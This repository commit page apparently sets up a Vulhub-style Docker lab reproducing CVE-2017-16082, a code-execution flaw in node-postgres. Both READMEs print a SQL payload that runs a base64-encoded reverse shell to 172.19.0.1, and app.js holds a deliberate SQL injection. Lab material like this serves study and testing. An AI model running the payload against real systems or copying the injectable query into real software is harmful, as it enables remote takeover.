aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
node/CVE-2017-16082/Dockerfile Normal file
View File

@@ -0,0 +1,16 @@
FROM vulhub/node:9.0.0
LABEL maintainer="phithon <root@leavesongs.com>"
COPY package.json package-lock.json /usr/src/
ADD https://raw.githubusercontent.com/vishnubob/wait-for-it/master/wait-for-it.sh /usr/local/bin/wait-for-it.sh
RUN set -ex \
&& cd /usr/src/ \
&& npm install \
&& chmod +x /usr/local/bin/wait-for-it.sh
WORKDIR /usr/src
CMD [ "npm", "run", "start" ]

44
node/CVE-2017-16082/README.md Normal file
View File

@@ -0,0 +1,44 @@
# Node-Postgres Remote Code Execution (CVE-2017-16082)
[中文版本(Chinese version)](README.zh-cn.md)
Node-postgres is a Node.js client for PostgreSQL. It is a popular database connector for Node.js applications.
When node-postgres processes a PostgreSQL response packet of type `Row Description`, it concatenates the field names into the code. Due to improper escaping, a specially crafted field name can escape the code's single quote restriction, leading to code execution vulnerability.
Reference links:
- https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html
- https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability
- https://zhuanlan.zhihu.com/p/28575189
## Environment Setup
Run the following commands to build and start a vulnerable application based on node-postgres 7.1.0:
```
docker compose build
docker compose up -d
```
After the server is successfully started, visit `http://your-ip:3000/?id=1` to view information for user with id 1. Using sqlmap, you can discover that there is an injection point here, and the database is PostgreSQL:
![](img/1.png)
## Vulnerability Reproduce
We can then assume that the node-postgres code execution vulnerability exists here. Write the command you want to execute `echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`, then split it appropriately (each segment should not exceed 64 characters) and replace it in the following payload:
```
SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3Rj`+/*", 4 AS "*/`cC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`)//"
```
Send the above payload after encoding:
![](img/2.png)
Successfully execute commands, such as reverse shell:
![](img/3.png)
Because there are many difficulties in the reproduction process, if you encounter errors during payload generation and testing, please read [this article](https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html) to understand the underlying principles and find the source of the problem.

42
node/CVE-2017-16082/README.zh-cn.md Normal file
View File

@@ -0,0 +1,42 @@
# node-postgres 代码执行漏洞CVE-2017-16082
## 漏洞原理
node-postgres在处理类型为`Row Description`的postgres返回包时将字段名拼接到代码中。由于没有进行合理转义导致一个特殊构造的字段名可逃逸出代码单引号限制造成代码执行漏洞。
参考链接:
- https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html
- https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability
- https://zhuanlan.zhihu.com/p/28575189
## 漏洞环境
执行如下命令编译及运行一个基于node-postgres 7.1.0的漏洞环境:
```
docker compose build
docker compose up -d
```
成功运行后,访问`http://your-ip:3000/?id=1`即可查看到id为1的用户信息用sqlmap即可发现此处存在注入点且数据库为postgres
![](img/1.png)
## 漏洞复现
那么我们就可以猜测这里存在node-postgres的代码执行漏洞。编写我想执行的命令`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`然后适当分割每段长度不超过64字符后替换在如下payload中
```
SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3Rj`+/*", 4 AS "*/`cC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`)//"
```
将上述payload编码后发送
![](img/2.png)
成功执行命令如反弹shell
![](img/3.png)
因为复现过程中坑比较多payload生成与测试过程中如果出现错误还请多多阅读[我的这篇文章](https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html),从原理上找到问题所在。

28
node/CVE-2017-16082/db.sql Normal file
View File

@@ -0,0 +1,28 @@
-- ----------------------------
-- Table structure for user
-- ----------------------------
DROP TABLE IF EXISTS "public"."user";
CREATE TABLE "public"."user" (
"id" int4 NOT NULL,
"name" varchar(255) COLLATE "default" NOT NULL,
"score" int4 DEFAULT 0
)
WITH (OIDS=FALSE)
;
-- ----------------------------
-- Records of user
-- ----------------------------
INSERT INTO "public"."user" VALUES ('1', 'zhang', '50');
INSERT INTO "public"."user" VALUES ('2', 'wang', '90');
INSERT INTO "public"."user" VALUES ('3', 'hu', '68');
-- ----------------------------
-- Alter Sequences Owned By
-- ----------------------------
-- ----------------------------
-- Primary Key structure for table user
-- ----------------------------
ALTER TABLE "public"."user" ADD PRIMARY KEY ("id");

16
node/CVE-2017-16082/docker-compose.yml Normal file
View File

@@ -0,0 +1,16 @@
services:
node:
build: .
depends_on:
- db
ports:
- "3000:3000"
volumes:
- ./www:/usr/src/www
db:
image: postgres:9.6
environment:
- POSTGRES_PASSWORD=postgres
- POSTGRES_DB=example
volumes:
- ./db.sql:/docker-entrypoint-initdb.d/db.sql

BIN
node/CVE-2017-16082/img/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 42 KiB

BIN
node/CVE-2017-16082/img/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 36 KiB

BIN
node/CVE-2017-16082/img/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

358
node/CVE-2017-16082/package-lock.json generated Normal file
View File

@@ -0,0 +1,358 @@
{
"name": "node_postgres_example",
"version": "1.0.0",
"lockfileVersion": 1,
"requires": true,
"dependencies": {
"accepts": {
"version": "1.3.4",
"resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.4.tgz",
"integrity": "sha1-hiRnWMfdbSGmR0/whKR0DsBesh8=",
"requires": {
"mime-types": "2.1.17",
"negotiator": "0.6.1"
}
},
"any-promise": {
"version": "1.3.0",
"resolved": "https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz",
"integrity": "sha1-q8av7tzqUugJzcA3au0845Y10X8="
},
"buffer-writer": {
"version": "1.0.1",
"resolved": "https://registry.npmjs.org/buffer-writer/-/buffer-writer-1.0.1.tgz",
"integrity": "sha1-Iqk2kB4wKa/NdUfrRIfOtpejvwg="
},
"co": {
"version": "4.6.0",
"resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz",
"integrity": "sha1-bqa989hTrlTMuOR7+gvz+QMfsYQ="
},
"content-disposition": {
"version": "0.5.2",
"resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.2.tgz",
"integrity": "sha1-DPaLud318r55YcOoUXjLhdunjLQ="
},
"content-type": {
"version": "1.0.4",
"resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.4.tgz",
"integrity": "sha512-hIP3EEPs8tB9AT1L+NUqtwOAps4mk2Zob89MWXMHjHWg9milF/j4osnnQLXBCBFBk/tvIG/tUc9mOUJiPBhPXA=="
},
"cookies": {
"version": "0.7.1",
"resolved": "https://registry.npmjs.org/cookies/-/cookies-0.7.1.tgz",
"integrity": "sha1-fIphX1SBxhq58WyDNzG8uPZjuZs=",
"requires": {
"depd": "1.1.1",
"keygrip": "1.0.2"
}
},
"debug": {
"version": "3.1.0",
"resolved": "https://registry.npmjs.org/debug/-/debug-3.1.0.tgz",
"integrity": "sha512-OX8XqP7/1a9cqkxYw2yXss15f26NKWBpDXQd0/uK/KPqdQhxbPa994hnzjcE2VqQpDslf55723cKPUOGSmMY3g==",
"requires": {
"ms": "2.0.0"
}
},
"deep-equal": {
"version": "1.0.1",
"resolved": "https://registry.npmjs.org/deep-equal/-/deep-equal-1.0.1.tgz",
"integrity": "sha1-9dJgKStmDghO/0zbyfCK0yR0SLU="
},
"delegates": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/delegates/-/delegates-1.0.0.tgz",
"integrity": "sha1-hMbhWbgZBP3KWaDvRM2HDTElD5o="
},
"depd": {
"version": "1.1.1",
"resolved": "https://registry.npmjs.org/depd/-/depd-1.1.1.tgz",
"integrity": "sha1-V4O04cRZ8G+lyif5kfPQbnoxA1k="
},
"destroy": {
"version": "1.0.4",
"resolved": "https://registry.npmjs.org/destroy/-/destroy-1.0.4.tgz",
"integrity": "sha1-l4hXRCxEdJ5CBmE+N5RiBYJqvYA="
},
"ee-first": {
"version": "1.1.1",
"resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz",
"integrity": "sha1-WQxhFWsK4vTwJVcyoViyZrxWsh0="
},
"error-inject": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/error-inject/-/error-inject-1.0.0.tgz",
"integrity": "sha1-4rPZG1Su1nLzCdlQ0VSFD6EdTzc="
},
"escape-html": {
"version": "1.0.3",
"resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz",
"integrity": "sha1-Aljq5NPQwJdN4cFpGI7wBR0dGYg="
},
"fresh": {
"version": "0.5.2",
"resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz",
"integrity": "sha1-PYyt2Q2XZWn6g1qx+OSyOhBWBac="
},
"http-assert": {
"version": "1.3.0",
"resolved": "https://registry.npmjs.org/http-assert/-/http-assert-1.3.0.tgz",
"integrity": "sha1-oxpc+IyHPsu1eWkH1NbxMujAHko=",
"requires": {
"deep-equal": "1.0.1",
"http-errors": "1.6.2"
}
},
"http-errors": {
"version": "1.6.2",
"resolved": "https://registry.npmjs.org/http-errors/-/http-errors-1.6.2.tgz",
"integrity": "sha1-CgAsyFcHGSp+eUbO7cERVfYOxzY=",
"requires": {
"depd": "1.1.1",
"inherits": "2.0.3",
"setprototypeof": "1.0.3",
"statuses": "1.4.0"
}
},
"inherits": {
"version": "2.0.3",
"resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.3.tgz",
"integrity": "sha1-Yzwsg+PaQqUC9SRmAiSA9CCCYd4="
},
"is-generator-function": {
"version": "1.0.6",
"resolved": "https://registry.npmjs.org/is-generator-function/-/is-generator-function-1.0.6.tgz",
"integrity": "sha1-nnFlPNFf/zQcecQVFGChMdMen8Q="
},
"keygrip": {
"version": "1.0.2",
"resolved": "https://registry.npmjs.org/keygrip/-/keygrip-1.0.2.tgz",
"integrity": "sha1-rTKXxVcGneqLz+ek+kkbdcXd65E="
},
"koa": {
"version": "2.3.0",
"resolved": "https://registry.npmjs.org/koa/-/koa-2.3.0.tgz",
"integrity": "sha1-nh6OTaQBg5xXuFJ+rcV/dhJ1Vac=",
"requires": {
"accepts": "1.3.4",
"content-disposition": "0.5.2",
"content-type": "1.0.4",
"cookies": "0.7.1",
"debug": "3.1.0",
"delegates": "1.0.0",
"depd": "1.1.1",
"destroy": "1.0.4",
"error-inject": "1.0.0",
"escape-html": "1.0.3",
"fresh": "0.5.2",
"http-assert": "1.3.0",
"http-errors": "1.6.2",
"is-generator-function": "1.0.6",
"koa-compose": "4.0.0",
"koa-convert": "1.2.0",
"koa-is-json": "1.0.0",
"mime-types": "2.1.17",
"on-finished": "2.3.0",
"only": "0.0.2",
"parseurl": "1.3.2",
"statuses": "1.4.0",
"type-is": "1.6.15",
"vary": "1.1.2"
}
},
"koa-compose": {
"version": "4.0.0",
"resolved": "https://registry.npmjs.org/koa-compose/-/koa-compose-4.0.0.tgz",
"integrity": "sha1-KAClE9nDYe8NY4UrA45Pby1adzw="
},
"koa-convert": {
"version": "1.2.0",
"resolved": "https://registry.npmjs.org/koa-convert/-/koa-convert-1.2.0.tgz",
"integrity": "sha1-2kCHXfSd4FOQmNFwC1CCDOvNIdA=",
"requires": {
"co": "4.6.0",
"koa-compose": "3.2.1"
},
"dependencies": {
"koa-compose": {
"version": "3.2.1",
"resolved": "https://registry.npmjs.org/koa-compose/-/koa-compose-3.2.1.tgz",
"integrity": "sha1-qFzLQLfZhtjlo0Wzoazo6rz1Tec=",
"requires": {
"any-promise": "1.3.0"
}
}
}
},
"koa-is-json": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/koa-is-json/-/koa-is-json-1.0.0.tgz",
"integrity": "sha1-JzwH7c3Ljfaiwat9We52SRRR7BQ="
},
"media-typer": {
"version": "0.3.0",
"resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz",
"integrity": "sha1-hxDXrwqmJvj/+hzgAWhUUmMlV0g="
},
"mime-db": {
"version": "1.30.0",
"resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.30.0.tgz",
"integrity": "sha1-dMZD2i3Z1qRTmZY0ZbJtXKfXHwE="
},
"mime-types": {
"version": "2.1.17",
"resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.17.tgz",
"integrity": "sha1-Cdejk/A+mVp5+K+Fe3Cp4KsWVXo=",
"requires": {
"mime-db": "1.30.0"
}
},
"ms": {
"version": "2.0.0",
"resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz",
"integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g="
},
"negotiator": {
"version": "0.6.1",
"resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.1.tgz",
"integrity": "sha1-KzJxhOiZIQEXeyhWP7XnECrNDKk="
},
"on-finished": {
"version": "2.3.0",
"resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz",
"integrity": "sha1-IPEzZIGwg811M3mSoWlxqi2QaUc=",
"requires": {
"ee-first": "1.1.1"
}
},
"only": {
"version": "0.0.2",
"resolved": "https://registry.npmjs.org/only/-/only-0.0.2.tgz",
"integrity": "sha1-Kv3oTQPlC5qO3EROMGEKcCle37Q="
},
"packet-reader": {
"version": "0.3.1",
"resolved": "https://registry.npmjs.org/packet-reader/-/packet-reader-0.3.1.tgz",
"integrity": "sha1-zWLmCvjX/qinBexP+ZCHHEaHHyc="
},
"parseurl": {
"version": "1.3.2",
"resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.2.tgz",
"integrity": "sha1-/CidTtiZMRlGDBViUyYs3I3mW/M="
},
"pg": {
"version": "7.1.0",
"resolved": "https://registry.npmjs.org/pg/-/pg-7.1.0.tgz",
"integrity": "sha1-naPwnTmDUhUhwdg2m22aEwbP6f4=",
"requires": {
"buffer-writer": "1.0.1",
"packet-reader": "0.3.1",
"pg-connection-string": "0.1.3",
"pg-pool": "2.0.3",
"pg-types": "1.12.1",
"pgpass": "1.0.2",
"semver": "4.3.2"
}
},
"pg-connection-string": {
"version": "0.1.3",
"resolved": "https://registry.npmjs.org/pg-connection-string/-/pg-connection-string-0.1.3.tgz",
"integrity": "sha1-2hhHsglA5C7hSSvq9l1J2RskXfc="
},
"pg-pool": {
"version": "2.0.3",
"resolved": "https://registry.npmjs.org/pg-pool/-/pg-pool-2.0.3.tgz",
"integrity": "sha1-wCIDLIlJ8xKk+R+2QJzgQHa+Mlc="
},
"pg-types": {
"version": "1.12.1",
"resolved": "https://registry.npmjs.org/pg-types/-/pg-types-1.12.1.tgz",
"integrity": "sha1-1kCH45A7WP+q0nnnWVxSIIoUw9I=",
"requires": {
"postgres-array": "1.0.2",
"postgres-bytea": "1.0.0",
"postgres-date": "1.0.3",
"postgres-interval": "1.1.1"
}
},
"pgpass": {
"version": "1.0.2",
"resolved": "https://registry.npmjs.org/pgpass/-/pgpass-1.0.2.tgz",
"integrity": "sha1-Knu0G2BltnkH6R2hsHwYR8h3swY=",
"requires": {
"split": "1.0.1"
}
},
"postgres-array": {
"version": "1.0.2",
"resolved": "https://registry.npmjs.org/postgres-array/-/postgres-array-1.0.2.tgz",
"integrity": "sha1-jgsy6wO/d6XAp4UeBEHBaaJWojg="
},
"postgres-bytea": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/postgres-bytea/-/postgres-bytea-1.0.0.tgz",
"integrity": "sha1-AntTPAqokOJtFy1Hz5zOzFIazTU="
},
"postgres-date": {
"version": "1.0.3",
"resolved": "https://registry.npmjs.org/postgres-date/-/postgres-date-1.0.3.tgz",
"integrity": "sha1-4tiXAu/bJY/52c7g/pG9BpdSV6g="
},
"postgres-interval": {
"version": "1.1.1",
"resolved": "https://registry.npmjs.org/postgres-interval/-/postgres-interval-1.1.1.tgz",
"integrity": "sha512-OkuCi9t/3CZmeQreutGgx/OVNv9MKHGIT5jH8KldQ4NLYXkvmT9nDVxEuCENlNwhlGPE374oA/xMqn05G49pHA==",
"requires": {
"xtend": "4.0.1"
}
},
"semver": {
"version": "4.3.2",
"resolved": "https://registry.npmjs.org/semver/-/semver-4.3.2.tgz",
"integrity": "sha1-x6BxWKgL7dBSNVt3DYLWZA+AO+c="
},
"setprototypeof": {
"version": "1.0.3",
"resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.0.3.tgz",
"integrity": "sha1-ZlZ+NwQ+608E2RvWWMDL77VbjgQ="
},
"split": {
"version": "1.0.1",
"resolved": "https://registry.npmjs.org/split/-/split-1.0.1.tgz",
"integrity": "sha512-mTyOoPbrivtXnwnIxZRFYRrPNtEFKlpB2fvjSnCQUiAA6qAZzqwna5envK4uk6OIeP17CsdF3rSBGYVBsU0Tkg==",
"requires": {
"through": "2.3.8"
}
},
"statuses": {
"version": "1.4.0",
"resolved": "https://registry.npmjs.org/statuses/-/statuses-1.4.0.tgz",
"integrity": "sha512-zhSCtt8v2NDrRlPQpCNtw/heZLtfUDqxBM1udqikb/Hbk52LK4nQSwr10u77iopCW5LsyHpuXS0GnEc48mLeew=="
},
"through": {
"version": "2.3.8",
"resolved": "https://registry.npmjs.org/through/-/through-2.3.8.tgz",
"integrity": "sha1-DdTJ/6q8NXlgsbckEV1+Doai4fU="
},
"type-is": {
"version": "1.6.15",
"resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.15.tgz",
"integrity": "sha1-yrEPtJCeRByChC6v4a1kbIGARBA=",
"requires": {
"media-typer": "0.3.0",
"mime-types": "2.1.17"
}
},
"vary": {
"version": "1.1.2",
"resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz",
"integrity": "sha1-IpnwLG3tMNSllhsLn3RSShj2NPw="
},
"xtend": {
"version": "4.0.1",
"resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.1.tgz",
"integrity": "sha1-pcbVMr5lbiPbgg77lDofBJmNY68="
}
}
}

19
node/CVE-2017-16082/package.json Normal file
View File

@@ -0,0 +1,19 @@
{
"name": "node_postgres_example",
"version": "1.0.0",
"description": "",
"main": "app.js",
"scripts": {
"start": "wait-for-it.sh db:5432 && cd www/ && node app.js",
"test": "echo \"Error: no test specified\" && exit 1"
},
"keywords": [
"postgres"
],
"author": "phith0n",
"license": "MIT",
"dependencies": {
"koa": "^2.3.0",
"pg": "7.1.0"
}
}

32
node/CVE-2017-16082/www/app.js Normal file
View File

@@ -0,0 +1,32 @@
const Koa = require('koa')
const { Client } = require('pg')
const app = new Koa()
const client = new Client({
user: "postgres",
password: "postgres",
database: "example",
host: "db",
port: 5432
})
client.connect()
app.use(async ctx => {
ctx.response.type = 'html'
let id = ctx.request.query.id || 1
let sql = `SELECT * FROM "user" WHERE "id" = ${id}`
const res = await client.query(sql)
ctx.body = `<html>
<body>
<table>
<tr><th>id</th><td>${res.rows[0].id}</td></tr>
<tr><th>name</th><td>${res.rows[0].name}</td></tr>
<tr><th>score</th><td>${res.rows[0].score}</td></tr>
</table>
</body>
</html>`
})
app.listen(3000)